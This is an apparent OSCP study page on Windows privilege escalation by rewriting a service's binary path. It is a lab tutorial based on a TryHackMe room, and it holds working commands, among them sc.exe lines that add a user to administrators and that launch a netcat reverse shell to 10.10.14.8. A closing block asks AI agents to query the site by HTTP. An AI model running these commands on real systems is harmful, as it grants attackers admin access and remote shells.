# Binary Paths

## Overview

Services sometimes have executables attached to them. If we have the right permissions to the service then we can change the **binary path** (executable file) to a malicious one.

## Exploitation via Powershell

View services

```
Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}
```

View permissions

```
icacls "C:\xampp\apache\bin\mysqld.exe"
```

<table><thead><tr><th width="133">Mask</th><th>Permissions</th></tr></thead><tbody><tr><td>F</td><td>Full access</td></tr><tr><td>M</td><td>Modify access</td></tr><tr><td>RX</td><td>Read and execute access</td></tr><tr><td>R</td><td>Read-only access</td></tr><tr><td>W</td><td>Write-only access</td></tr></tbody></table>

Replace service binary with malicious one then restart service

```
Get-CimInstance -ClassName win32_service | Select Name, StartMode | Where-Object {$_.Name -like 'mysql'}
net stop mysql
net start mysql
shutdown /r /t 0
```

## Exploitation using PowerUp

#### Run PowerUp on machine

```powerquery
. .\PowerUp.ps1
Invoke-AllChecks
```

<figure><img src="/files/9OyK3ubE3rgWjbQHj4qQ" alt=""><figcaption><p>TCM Windows Priv Esc on Try Hack Me</p></figcaption></figure>

#### Change the binary path

```powerquery
sc.exe config daclsvc binpath= "net localgroup administrators Greg /add"
sc.exe config daclsvc binpath= "C:\temp\nc.exe -e cmd.exe 10.10.14.8 1337" 
```

#### Start service

```powerquery
sc.exe start dacl 
```

## Exploitation via Accesschk64

#### Check for services with write permissions

```
accesschk64.exe --accept-eula -uwcv Everyone *
```

<figure><img src="/files/Zj5d3eQv0PFDyZn25C46" alt=""><figcaption><p>TCM Windows Priv Esc on Try Hack Me</p></figcaption></figure>

```
accesschk64.exe -uwcv daclsvc
```

<figure><img src="/files/Azm098szRD9lItKXsNra" alt=""><figcaption><p>TCM Windows Priv Esc on Try Hack Me</p></figcaption></figure>

#### Query the service

```powerquery
sc qc daclsvc
```

<figure><img src="/files/I7VhqgAYTcqeIH4PRRr7" alt=""><figcaption><p>TCM Windows Priv Esc on Try Hack Me</p></figcaption></figure>

#### Changing the binary path is the same as the last method


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://oscp.adot8.com/windows-privilege-escalation/service-permissions/binary-paths.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.